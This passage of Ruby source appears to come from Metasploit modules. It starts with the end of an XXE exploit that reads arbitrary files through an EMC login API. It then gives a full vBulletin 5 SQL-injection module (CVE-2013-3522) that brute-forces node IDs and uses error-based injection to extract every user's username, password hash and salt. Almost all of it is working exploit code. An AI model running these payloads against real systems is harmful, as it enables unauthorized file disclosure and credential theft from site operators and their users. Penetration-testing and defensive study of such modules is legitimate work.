<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>
<Request>
<Username>root</Username>
<Password>&#{entity};</Password>
</Request>
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),
      'method' => 'POST',
      'data' => pay
    })

    if !res or !res.body
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
    end

    # /m lets the capture span newlines, i.e. multi-line file content.
    file = /For input string: "(.*)"/m.match(res.body)

    if !file or file.length < 2
      fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")
    end

    file = file[1]

    path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])

    print_good("File saved to: " + path)
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# vBulletin 5 `nodeid` SQL injection (CVE-2013-3522). Uses an error-based
# technique: the injected query forces a duplicate-key error whose message
# contains the selected value wrapped in a random marker, and the module
# reads it back out of the "Database error in vBulletin" page. Collected
# usernames, password hashes and salts are reported as credentials.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options. NODE, if > 0, is used directly; otherwise
  # MINNODE..MAXNODE is searched for a node id that triggers the error.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'vBulletin Password Collector via nodeid SQL Injection',
      'Description' => %q{
        This module exploits a SQL injection vulnerability found in vBulletin 5 that has been
        used in the wild since March 2013. This module can be used to extract the web application's
        usernames and hashes, which could be used to authenticate into the vBulletin admin control
        panel.
      },
      'References' =>
        [
          [ 'CVE', '2013-3522' ],
          [ 'OSVDB', '92031' ],
          [ 'EDB', '24882' ],
          [ 'BID', '58754' ],
          [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
        ],
      'Author' =>
        [
          'Orestis Kourides', # Vulnerability discovery and PoC
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2013-03-24'
    ))

    register_options(
      [
        OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
        OptInt.new("NODE", [false, 'Valid Node ID']),
        OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
        OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
      ])
  end

  # True when injecting through node +id+ echoes a random marker back,
  # i.e. the node id is usable for extraction. One HTTP request per call.
  def exists_node?(id)
    mark = Rex::Text.rand_text_alpha(8 + rand(5))
    result = do_sqli(id, "select '#{mark}'")

    if result and result =~ /#{mark}/
      return true
    end

    return false
  end

  # Linear search of MINNODE..MAXNODE for a usable node id.
  # @return [Integer, nil] first id for which #exists_node? is true, or nil
  #   (also nil, with an error line, when MINNODE > MAXNODE).
  def brute_force_node
    min = datastore["MINNODE"]
    max = datastore["MAXNODE"]

    if min > max
      print_error("MINNODE can't be major than MAXNODE")
      return nil
    end

    for node_id in min..max
      if exists_node?(node_id)
        return node_id
      end
    end

    return nil
  end

  # Resolves the node id to use: the NODE option when set and positive and
  # confirmed by #exists_node?, otherwise the result of #brute_force_node.
  # @return [Integer, nil]
  def get_node
    if datastore['NODE'].nil? or datastore['NODE'] <= 0
      print_status("Brute forcing to find a valid node id...")
      return brute_force_node
    end

    print_status("Checking node id #{datastore['NODE']}...")
    if exists_node?(datastore['NODE'])
      return datastore['NODE']
    else
      return nil
    end
  end

  # session maybe isn't needed, unauthenticated
  #
  # Runs one error-based extraction of +query+ through the nodeid parameter.
  # @param node  [Integer] node id to inject through
  # @param query [String] scalar SQL subquery whose result is wanted
  # @return [String, nil] nil unless the response is HTTP 200 and contains
  #   "Database error in vBulletin"; otherwise the text between the two
  #   marker occurrences, or "" when the marker is absent from the error page.
  #   Callers therefore see "" (not nil) for "vulnerable but nothing echoed".
  def do_sqli(node, query)
    mark = Rex::Text.rand_text_alpha(5 + rand(3))
    random_and = Rex::Text.rand_text_numeric(4)
    injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
    injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
    injection << "AND (#{random_and}=#{random_and}"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
      'vars_post' =>
        {
          'nodeid' => "#{node}#{injection}",
        }
    })

    unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
      return nil
    end

    data = ""

    if res.body.to_s =~ /#{mark}(.*)#{mark}/
      data = $1
    end

    return data
  end

  # Fetches one user row as [username, password, salt]; three separate
  # requests per user (one per column), each via #do_sqli. Elements may be
  # nil or "" per #do_sqli's contract.
  def get_user_data(node_id, user_id)
    user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
    pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
    salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")

    return [user, pass, salt]
  end

  # Vulnerability check.
  # @return [Msf::Exploit::CheckCode] Appears when index.php reports
  #   "simpleversion": "v=5" and a usable node id is found; Detected when only
  #   the version fingerprint matches; Safe otherwise.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "index.php")
    })

    if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
      if get_node
        # Multiple factors determine this LOOKS vulnerable
        return Msf::Exploit::CheckCode::Appears
      else
        # Not enough information about the vuln state, but at least we know this is vbulletin
        return Msf::Exploit::CheckCode::Detected
      end
    end

    Msf::Exploit::CheckCode::Safe
  end

  # Stores one username/hash pair in the credential database as an UNTRIED,
  # non-replayable md5 hash, with the salt carried in :proof.
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :nonreplayable_hash,
      jtr_format: 'md5'
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Main flow: find a node id, count users, then pull each row and report it.
  # `data.blank?` is an ActiveSupport-style predicate (not visible here) that
  # covers both the nil and the "" returns of #do_sqli. Rows whose three
  # fields are all empty are skipped rather than reported.
  def run
    print_status("Checking for a valid node id...")
    node_id = get_node
    if node_id.nil?
      print_error("node id not found")
      return
    end

    print_good("Using node id #{node_id} to exploit sqli... Counting users...")
    data = do_sqli(node_id, "select count(*) from user")
    if data.blank?
      print_error("Error exploiting sqli")
      return
    end
    count_users = data.to_i
    print_good("#{count_users} users found. Collecting credentials...")

    users_table = Rex::Text::Table.new(
      'Header' => 'vBulletin Users',
      'Indent' => 1,
      'Columns' => ['Username', 'Password Hash', 'Salt']
    )

    for i in 0..count_users
      user = get_user_data(node_id, i)
      unless user.join.empty?
        report_cred(
          ip: rhost,
          port: rport,
          user: user[0],
          password: user[1],
          service_name: (ssl ? "https" : "http"),
          proof: "salt: #{user[2]}"
        )
        users_table << user
      end
    end

    if users_table.rows.length > 0
      print_good("#{users_table.rows.length.to_s} credentials successfully collected")
      print_line(users_table.to_s)
    else
      print_error("Unfortunately the module was unable to extract any credentials")
    end
  end


end
